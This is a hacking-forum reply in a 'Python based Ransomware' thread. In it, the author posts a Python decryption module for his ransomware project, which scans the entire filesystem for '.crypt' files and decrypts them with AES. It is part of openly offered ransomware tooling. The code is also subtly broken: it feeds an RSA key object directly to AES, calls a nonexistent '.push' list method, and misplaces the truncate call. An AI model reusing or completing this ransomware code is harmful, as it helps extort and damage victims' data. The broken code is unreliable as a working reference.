chevron_left chevron_right
Login Register invert_colors photo_library


Stay updated and chat with others! - Join the Discord!
Thread Rating:
  • 0 Vote(s) - 0 Average


Python based Ransomware. filter_list
Author
Message
RE: Python based Ransomware. #5
Sorry for my absence, i forgot i had a Sinister.ly account, lol. Anyway now that i am here again, i bring updates to this project in the form of bug fixes and the decryption module.

Code:
import os
import sys
import struct

from base64 import b64decode
from Crypto.Cipher import AES
from Crypto.PublicKey import RSA
from multiprocessing import Pool

# Read in and decode keyfile
with open('privkey', 'r') as keyfile:
    keyData = keyfile.read().replace('\n', '')

keyDER = b64decode(keyData)    
key = RSA.importKey(keyDER)


def decrypt_file(key, in_filename, out_filename=None, chunksize=24*1024):

    # Split .crypt extension to restore file format
    if not out_filename:
        out_filename = os.path.splitext(in_filename)[0]

    with open(in_filename, 'rb') as infile:
        origsize = struct.unpack('<Q', infile.read(struct.calcsize('Q')))[0]
        iv = infile.read(16)
        decryptor = AES.new(key, AES.MODE_CBC, iv)

        with open(out_filename, 'wb') as outfile:
            while True:
                chunk = infile.read(chunksize)
                if len(chunk) == 0:
                    break
                outfile.write(decryptor.decrypt(chunk))
        
        # Truncate file to original size
            outfile.truncate(origsize)


def single_arg_decrypt_file(in_filename):
    decrypt_file(key, in_filename)


def select_files():
    # Files to be decrypted are identified by .crypt extension
    ext = ".crypt"
          
    files_to_dec = []
    for root, dirs, files in os.walk("/"):
        for file in files:
            if file.endswith(str(ext)):
                files_to_dec.push(os.path.join(root, file))
    
    # Parralelize execution of decrypting function over four sub processes
    pool = Pool(processes=4)
    pool.map(single_arg_decrypt_file, files_to_dec)


if __name__=="__main__":
    select_files()

[+] 2 users Like VectorSEC's post
Reply




Messages In This Thread
Python based Ransomware. - by VectorSEC - 10-10-2016, 10:10 AM
RE: Python based Ransomware. - by BreShiE - 10-11-2016, 12:03 AM
RE: Python based Ransomware. - by Inori - 10-11-2016, 12:12 AM
RE: Python based Ransomware. - by Bish0pQ - 10-11-2016, 10:17 AM
RE: Python based Ransomware. - by VectorSEC - 11-04-2016, 06:00 AM
RE: Python based Ransomware. - by Despised - 11-04-2016, 10:06 AM
RE: Python based Ransomware. - by BadSnow - 01-09-2017, 08:34 PM
RE: Python based Ransomware. - by prankd - 01-12-2017, 08:02 PM
RE: Python based Ransomware. - by silur - 02-01-2017, 01:37 PM



Users browsing this thread: 1 Guest(s)